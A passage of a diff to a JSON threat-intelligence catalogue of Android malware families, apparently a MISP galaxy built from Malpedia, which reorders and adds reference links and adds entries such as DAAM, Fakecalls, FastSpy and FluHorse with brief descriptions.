- "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/",
- "https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/",
- "https://www.theguardian.com/news/series/pegasus-project",
- "https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/",
- "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
- "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/",
- "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/",
"https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html",
- "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus",
- "https://twitter.com/alexanderjaeger/status/1417447732030189569",
- "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
- "https://citizenlab.ca/2021/07/amnesty-peer-review/",
- "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/",
- "https://nex.sx/blog/2021/08/03/the-pegasus-project.html",
- "https://objective-see.com/blog/blog_0x67.html",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
- "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/",
- "https://media.ccc.de/v/33c3-7901-pegasus_internals",
- "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html",
"https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/",
- "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/",
- "https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/",
- "https://forbiddenstories.org/about-the-pegasus-project/",
- "https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso",
- "https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/",
- "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/",
- "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto",
- "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests",
- "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html",
+ "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
+ "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://thewire.in/tag/pegasus-project",
+ "https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/",
+ "https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html",
+ "https://nex.sx/blog/2021/08/03/the-pegasus-project.html",
+ "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html",
+ "https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/",
"https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5",
- "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1"
+ "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
+ "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus",
+ "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/",
+ "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages",
+ "https://twitter.com/alexanderjaeger/status/1417447732030189569",
+ "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure",
+ "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/",
+ "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/",
+ "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
+ "https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/",
+ "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/",
+ "https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/",
+ "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/",
+ "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat",
+ "https://twitter.com/billmarczak/status/1416801439402262529",
+ "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/",
+ "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/",
+ "https://media.ccc.de/v/33c3-7901-pegasus_internals",
+ "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/",
+ "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/",
+ "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/",
+ "https://objective-see.com/blog/blog_0x67.html",
+ "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus",
+ "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and",
+ "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1",
+ "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/",
+ "https://irpimedia.irpi.eu/sorveglianze-cy4gate/",
+ "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html",
+ "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/",
+ "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying",
+ "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/",
+ "https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/",
+ "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/",
+ "https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/",
+ "https://thewire.in/media/pegasus-project-spyware-indian-journalists",
+ "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://forbiddenstories.org/about-the-pegasus-project/",
+ "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso",
+ "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/",
+ "https://citizenlab.ca/2021/07/amnesty-peer-review/",
+ "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/",
+ "https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/",
+ "https://www.theguardian.com/news/series/pegasus-project",
+ "https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/",
+ "https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/",
+ "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20"
],
"synonyms": [
"JigglyPuff",
@@ -668,15 +685,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "9d7c772b-43f1-49cf-bc70-7a7cd2ed34c8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad",
"value": "Chrysaor"
},
@@ -754,15 +762,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.coper",
- "https://cert-agid.gov.it/news/analisi-e-approfondimenti-tecnici-sul-malware-coper-utilizzato-per-attaccare-dispositivi-mobili/",
- "https://blog.cyble.com/2022/03/24/coper-banking-trojan/",
- "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html",
- "https://twitter.com/_icebre4ker_/status/1541875982684094465",
- "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/",
- "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0",
- "https://thehackernews.com/2022/04/new-octo-banking-trojan-spreading-via.html",
+ "https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/",
"https://www.trendmicro.com/en_us/research/22/g/examining-new-dawdropper-banking-dropper-and-daas-on-the-dark-we.html",
- "https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/"
+ "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/",
+ "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html",
+ "https://cert-agid.gov.it/news/analisi-e-approfondimenti-tecnici-sul-malware-coper-utilizzato-per-attaccare-dispositivi-mobili/",
+ "https://twitter.com/_icebre4ker_/status/1541875982684094465",
+ "https://blog.cyble.com/2022/03/24/coper-banking-trojan/",
+ "https://thehackernews.com/2022/04/new-octo-banking-trojan-spreading-via.html",
+ "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0",
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace"
],
"synonyms": [
"ExobotCompact",
@@ -822,8 +831,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.cyber_azov",
"https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/",
- "https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag",
- "https://twitter.com/sekoia_io/status/1554086468104196096"
+ "https://twitter.com/sekoia_io/status/1554086468104196096",
+ "https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag"
],
"synonyms": [],
"type": []
@@ -831,6 +840,19 @@
"uuid": "bb1821f9-eace-4e63-b55d-fc7821a6e5f1",
"value": "CyberAzov"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.daam",
+ "https://blog.cyble.com/2023/04/20/daam-android-botnet-being-distributed-through-trojanized-applications/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "37a3b62e-99da-47d7-81fb-78f745427b16",
+ "value": "DAAM"
+ },
{
"description": "",
"meta": {
@@ -893,9 +915,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy",
+ "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/",
- "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf",
- "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/"
+ "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf"
],
"synonyms": [],
"type": []
@@ -986,8 +1008,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
- "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/"
+ "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/"
],
"synonyms": [],
"type": []
@@ -1012,14 +1034,16 @@
"value": "Elibomi"
},
{
- "description": "",
+ "description": "According to Intel471, ERMAC, an Android banking trojan enables bad actors to determine when certain apps are launched and then overwrites the screen display to steal the user's credentials",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.ermac",
"https://twitter.com/ESETresearch/status/1445618031464357888",
"https://blog.cyble.com/2022/05/25/ermac-back-in-action/",
+ "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html",
+ "https://intel471.com/blog/rmac-2-0-perfecting-the-art-of-account-takeover",
"https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
- "https://intel471.com/blog/rmac-2-0-perfecting-the-art-of-account-takeover"
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace"
],
"synonyms": [],
"type": []
@@ -1032,9 +1056,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot",
- "https://www.youtube.com/watch?v=qqwOrLR2rgU",
"https://twitter.com/ThreatFabric/status/1240664876558823424",
- "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born"
+ "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born",
+ "https://www.youtube.com/watch?v=qqwOrLR2rgU"
],
"synonyms": [],
"type": []
@@ -1047,13 +1071,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot",
- "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/",
+ "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/",
+ "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html",
"https://www.bleepingcomputer.com/news/security/source-code-for-exobot-android-banking-trojan-leaked-online/",
+ "https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/",
"https://www.bleepingcomputer.com/news/security/exobot-author-calls-it-quits-and-sells-off-banking-trojan-source-code/",
"https://blog.cyble.com/2022/03/24/coper-banking-trojan/",
- "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html",
- "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/",
- "https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/"
+ "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/"
],
"synonyms": [],
"type": []
@@ -1066,10 +1090,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus",
- "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv",
- "https://securitywithoutborders.org/blog/2019/03/29/exodus.html",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store"
+ "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store",
+ "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv",
+ "https://securitywithoutborders.org/blog/2019/03/29/exodus.html"
],
"synonyms": [],
"type": []
@@ -1082,9 +1106,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.facestealer",
- "https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html",
"https://labs.k7computing.com/index.php/facestealer-the-rise-of-facebook-credential-stealer-malware/",
- "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/"
+ "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/",
+ "https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html"
],
"synonyms": [],
"type": []
@@ -1105,16 +1129,30 @@
"uuid": "d0ae2b6b-5137-4b64-be3e-4bbc9aa007a6",
"value": "FakeAdBlocker"
},
+ {
+ "description": "According to Kaspersky, Fakecalls is a Trojan that masquerades as a banking app and imitates phone conversations with bank employees.\r\n\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakecalls",
+ "https://research.checkpoint.com/2023/south-korean-android-banking-menace-fakecalls/",
+ "https://www.kaspersky.com.au/blog/fakecalls-banking-trojan/30379/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "014aeab6-2292-4ee5-83d6-fffb0fc21423",
+ "value": "Fakecalls"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy",
- "https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html",
"https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html",
- "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
+ "https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/"
+ "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681"
],
"synonyms": [],
"type": []
@@ -1137,6 +1175,32 @@
"uuid": "6c0fc7e4-4629-494f-b471-f7a8cc47c0e0",
"value": "FakeGram"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fastfire",
+ "https://medium.com/s2wblog/unveil-the-evolution-of-kimsuky-targeting-android-devices-with-newly-discovered-mobile-malware-280dae5a650f"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5613da3a-06f5-4363-b468-0b8a03ffc292",
+ "value": "FastFire"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fastspy",
+ "https://medium.com/s2wblog/unveil-the-evolution-of-kimsuky-targeting-android-devices-with-newly-discovered-mobile-malware-280dae5a650f"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a5e3e217-3790-4d7c-b67a-906b9ee69034",
+ "value": "FastSpy"
+ },
{
"description": "",
"meta": {
@@ -1155,12 +1219,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher",
- "https://github.com/linuzifer/FinSpy-Dokumentation",
+ "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
"https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
+ "https://github.com/linuzifer/FinSpy-Dokumentation",
"https://securelist.com/finspy-unseen-findings/104322/",
"https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/",
- "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf",
- "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/"
+ "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf"
],
"synonyms": [],
"type": []
@@ -1203,43 +1267,45 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot",
- "https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027",
- "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
- "https://twitter.com/alberto__segura/status/1399249798063087621?s=20",
- "https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond",
- "https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/",
- "https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html",
- "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html",
- "https://www.infinitumit.com.tr/flubot-zararlisi/",
- "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html",
- "https://twitter.com/alberto__segura/status/1395675479194095618",
+ "https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain",
"https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html",
+ "https://twitter.com/alberto__segura/status/1399249798063087621?s=20",
+ "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06",
"https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/",
- "https://mobile.twitter.com/alberto__segura/status/1400396365759500289",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://twitter.com/alberto__segura/status/1384840011892285440",
"https://securityintelligence.com/posts/story-of-fakechat-malware/",
- "https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users",
- "https://blog.zimperium.com/flubot-vs-zimperium/",
- "https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/",
- "https://twitter.com/alberto__segura/status/1404098461440659459",
+ "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
+ "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
"https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon",
- "https://www.prodaft.com/m/reports/FluBot_4.pdf",
+ "https://twitter.com/alberto__segura/status/1395675479194095618",
+ "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/",
+ "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html",
+ "https://mobile.twitter.com/alberto__segura/status/1400396365759500289",
"https://hispasec.com/resources/FedexBanker.pdf",
+ "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9",
+ "https://www.infinitumit.com.tr/flubot-zararlisi/",
+ "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
+ "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/",
+ "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html",
+ "https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users",
+ "https://twitter.com/malwrhunterteam/status/1359939300238983172",
+ "https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/",
+ "https://blog.zimperium.com/flubot-vs-zimperium/",
+ "https://www.ncsc.admin.ch/22w12-de",
+ "https://www.prodaft.com/m/reports/FluBot_4.pdf",
"https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf",
"https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/",
- "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9",
- "https://twitter.com/malwrhunterteam/status/1359939300238983172",
- "https://twitter.com/alberto__segura/status/1402615237296148483",
- "https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones",
- "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
+ "https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html",
+ "https://twitter.com/alberto__segura/status/1404098461440659459",
+ "https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond",
+ "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368",
"https://therecord.media/flubot-malware-gang-arrested-in-barcelona/",
- "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06",
- "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/",
- "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/",
- "https://twitter.com/alberto__segura/status/1384840011892285440",
- "https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain",
- "https://www.ncsc.admin.ch/22w12-de",
- "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368"
+ "https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027",
+ "https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones",
+ "https://twitter.com/alberto__segura/status/1402615237296148483"
],
"synonyms": [
"Cabassous",
@@ -1250,6 +1316,19 @@
"uuid": "ef91833f-3334-4955-9218-f106494e9fc0",
"value": "FluBot"
},
+ {
+ "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse",
+ "https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "aeaeb8b2-650e-471d-a901-3c4fbae42854",
+ "value": "FluHorse"
+ },
{
"description": "Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, 3rd party app stores and sideloading. ",
"meta": {
@@ -1268,8 +1347,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot",
- "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
"https://securelist.com/roaming-mantis-part-v/96250/",
+ "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
"https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html"
],
"synonyms": [],
@@ -1283,12 +1362,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball",
+ "https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html",
"https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/",
- "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/",
"https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/",
"https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf",
"https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/",
- "https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html"
+ "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program"
],
"synonyms": [],
"type": []
@@ -1301,8 +1381,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost",
- "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/",
- "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/"
+ "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/",
+ "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/"
],
"synonyms": [],
"type": []
@@ -1336,17 +1416,31 @@
"uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5",
"value": "GhostCtrl"
},
+ {
